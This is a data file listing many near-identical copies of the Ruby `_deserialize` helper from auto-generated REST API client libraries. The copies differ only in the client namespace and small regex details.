"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = UltracartClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n DearInventoryRuby.const_get(type).build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Mooncard.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Aimastering.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Harbor1Client.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Intrinio.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /^(true|t|yes|y|1)$/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Pier.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = CrelateClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = WellsFargoAchClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ArtikCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Dkron.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n MailSlurpClient.const_get(type).build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n MailSlurpClient.const_get(type).build_from_hash(value)\n end\n end",
